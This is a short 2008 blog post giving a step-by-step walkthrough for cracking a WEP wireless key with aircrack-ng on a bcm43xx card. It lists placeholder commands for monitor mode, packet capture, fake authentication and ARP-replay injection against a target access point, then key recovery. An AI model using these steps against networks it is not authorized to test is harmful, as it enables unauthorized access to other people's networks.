Apr 8, 2008

Aircrack-ng review on bcm43xx



This post took me 2 days to make it ready. So here is the exact way on how do i crack the WEP in just about 20 mins.

It took 3 steps to make it ready before we can crack the wireless. First you need to know is how does WEP works. You can read about WEP here. So to make it possible to crack using aircrack-ng for bcm43xx, you need to patch your card. I post earlier a how-to patch bcm43xx in this post.

So here is four steps:
  • sudo airmon-ng [start|stop|check] [wireless interface] [channel]
  • sudo airodump [interface] [option] -w [prefix for output file]
  • sudo aireplay -1 0 -a [target mac] -h [your wireless mac] [interface]
  • sudo aireplay -3 -b [target mac] -h [your wireless mac] [interface]
Now wait until airodump capture enough packets (around 1300000+ ) is just enough to crack wep key using aircrack. Once you have finished capturing ivs , now it is time to do the crack.
  • sudo aircrack-ng [.cap files]
You can add more option depends on the wep key, for more info about option please refer to the manual page of the command.


Thank you for your unbelievable support on Negative Zero - Permission to read and write blog for nearly 4 years. Don't forget to like Negative Zero on Facebook.
Blogirific.com Blog Directory





Post(s) you might like to read :

Comments
0 Comments

0 comments:

Post a Comment